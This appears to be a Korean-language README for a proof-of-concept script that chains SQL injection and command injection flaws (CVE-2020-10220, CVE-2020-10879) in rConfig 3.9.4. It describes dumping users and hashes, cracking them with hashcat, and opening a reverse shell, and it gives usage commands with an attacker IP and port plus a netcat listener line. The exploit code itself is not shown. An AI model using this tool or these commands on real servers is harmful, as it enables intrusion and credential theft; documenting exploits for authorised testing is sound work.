
rConfig용 통합 PoC: SQL 인젝션 (CVE-2020-10220) & 명령어 인젝션 (CVE-2020-10879)
이 PoC는 rConfig 버전 3.9.4를 대상으로 하며, SQL 인젝션(SQL Injection)과 원격 명령어 인젝션(Remote Command Injection) 취약점을 결합한 공격을 시연합니다. 다음 과정을 자동화합니다:
rockyou 단어 목록과 best64.rules로 비밀번호 해시 크랙 시도이 스크립트는 다음 두 원본 PoC를 기반으로 통합하였습니다:
크래킹 및 선택적 셸 생성 자동화를 위해 수정되었습니다.
requests 라이브러리 (pip install requests)hashcat 설치/usr/share/wordlists/rockyou.txt에 위치한 rockyou.txt 단어 목록 (또는 이와 동등한 파일)/usr/share/hashcat/rules/best64.rule사용자와 해시만 덤프하려면:
python3 rConfig_rce.py https://target
사용자 덤프, 비밀번호 크랙 및 RCE 시도 (리버스 셸을 위한 공격자 IP와 포트 필요):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin 계정을 우선 사용합니다.nc -lvnp 80)를 실행 중인지 확인하십시오.이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 허가 없이 시스템에 무단으로 사용하는 것은 불법이며 비윤리적입니다.